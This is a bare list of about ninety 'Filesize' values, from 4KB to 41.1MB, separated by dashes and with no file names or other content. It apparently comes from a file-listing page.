Filesize
40.7MB
-
Filesize
1.2MB
-
Filesize
8KB
-
Filesize
696KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
688KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
912KB
-
Filesize
1.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
40.8MB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
31.7MB
-
Filesize
188KB
-
Filesize
8KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
41.1MB
-
Filesize
628KB
-
Filesize
80KB
-
Filesize
440KB
-
Filesize
828KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
5.0MB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
36KB